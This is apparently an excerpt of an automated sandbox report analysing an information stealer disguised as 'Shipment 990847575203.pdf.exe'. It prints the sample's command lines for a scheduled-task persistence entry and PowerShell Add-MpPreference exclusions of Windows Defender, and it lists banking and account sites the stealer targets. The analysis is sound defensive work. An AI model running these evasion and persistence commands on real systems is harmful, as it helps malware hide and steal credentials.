                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Code function: 0_2_0185D8B7 push edi; iretd 0_2_0185D8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB07D9 push edi; retn 0000h 9_2_00CB07DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB37E8 push esi; retf 9_2_00CB37E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB07E0 push edi; retn 0000h 9_2_00CB07EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB37E4 push esi; retf 9_2_00CB37E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB07AD push edi; retn 0000h 9_2_00CB07CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB891E pushad ; iretd 9_2_00CB891F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB8C2F pushfd ; iretd 9_2_00CB8C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_00CB8DDF push esp; iretd 9_2_00CB8DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 17_2_0119A5BB push es; ret 17_2_0119A5C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 17_2_06AB9233 push es; ret 17_2_06AB9244
                  Source: Shipment 990847575203.pdf.exe Static PE information: section name: .text entropy: 7.722678416773331
                  Source: FZcXKpA.exe.0.dr Static PE information: section name: .text entropy: 7.722678416773331
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack High entropy of concatenated method names
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack High entropy of concatenated method names
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File created: C:\Users\user\AppData\Roaming\FZcXKpA.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: Possible double extension: pdf.exe Static PE information: Shipment 990847575203.pdf.exe
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: 17F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: 32C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: 52C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: 94C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: A4C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: A6D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: B6D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: CB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 28D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2820000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: 32E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: 1640000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: 8EE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: 9EE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: A0D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: B0D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2EB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 3080000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 5080000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3237Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6320Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7956
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1887
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 3237 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 43 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7504Thread sleep count: 2049 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7504Thread sleep count: 7795 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788 Thread sleep count: 35 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788 Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788 Thread sleep time: -599875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7792 Thread sleep count: 7956 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7792 Thread sleep count: 1887 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Shipment 990847575203.pdf.exe, 00000000.00000002.2440674373.0000000008050000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: HGfsvbGkGW
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
                  Source: MSBuild.exe, 00000011.00000002.3574776920.0000000001237000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: MSBuild.exe, 00000011.00000002.3583881759.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 17_2_06AB9548 LdrInitializeThunk,17_2_06AB9548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 61A008
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F51008
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
